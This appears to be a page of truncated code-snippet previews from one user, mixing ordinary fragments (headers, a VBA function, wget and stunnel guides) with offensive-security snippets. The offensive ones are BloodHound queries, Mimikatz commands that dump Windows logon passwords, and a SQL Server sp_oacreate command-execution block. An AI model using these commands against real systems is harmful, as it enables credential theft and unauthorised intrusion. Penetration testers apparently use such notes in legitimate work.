humble-desser

#include "stdafx.h"
#include <windows.h>
#include <Winbase.h>
#include <Wtsapi32.h>
#include <Userenv.h>
#include <malloc.h>

#pragma comment(lib, "Wtsapi32.lib")
#pragma comment(lib, "Userenv.lib")

humble-desser

• Returns computer names and their operating system for statistics purposes

MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS

• Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:

MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC

humble-desser

How to tunnel SSH over SSL/TLS

laptop ssh -> laptop stunnel -> evil network -> internet -> your server -> your server ssh

Server (your shell server/home box/work box/whatever)

Sets up a stunnel process listening externally on port 2443/tcp, forwards to localhost 22/tcp

• Install stunnel, e.g. yum install stunnel
• Install server config snippet to /etc/stunnel/stunnel.conf

humble-desser

# On Windows, within a VS developer prompt

# Dump the exports of msvcrt.dll 
dumpbin.exe /exports C:\Windows\System32\msvcrt.dll > msvcrt.txt

# Copy msvcrt.txt to a Linux box

# Convert the file to Unix line endings
dos2unix msvcrt.txt

humble-desser

Function StringConcat(Sep As String, ParamArray Args()) As Variant
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' StringConcat
' By Chip Pearson, chip@cpearson.com, www.cpearson.com
'                  www.cpearson.com/Excel/stringconcatenation.aspx
' This function concatenates all the elements in the Args array,
' delimited by the Sep character, into a single string. This function
' can be used in an array formula. There is a VBA imposed limit that
' a string in a passed in array (e.g.,  calling this function from
' an array formula in a worksheet cell) must be less than 256 characters.

humble-desser

#general
privilege::debug
log
log customlogfilename.log


#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full

humble-desser

-- Another shorter way of doing it
-- https://sofianehamlaoui.github.io/Security-Cheatsheets/databases/sqlserver/3-command-execution/  

-- DECLARE @output INT
-- DECLARE @ProgramToRun VARCHAR(255)
-- SET @ProgramToRun = 'Run("calc.exe")'
-- EXEC sp_oacreate 'wScript.Shell', @output out
-- EXEC sp_oamethod @output, @ProgramToRun
-- EXEC sp_oadestroy @output

humble-desser

#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security

import os
import sys
import argparse
import re
import binascii
import codecs

humble-desser

The best way to download a website for offline use, using wget

There are two ways - the first way is just one command run plainly in front of you; the second one runs in the background and in a different instance so you can get out of your ssh session and it will continue.

First make a folder to download the websites to and begin your downloading: (note if downloading www.SOME_WEBSITE.com, you will get a folder like this: /websitedl/www.SOME_WEBSITE.com/)

STEP 1:

humble-desser

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;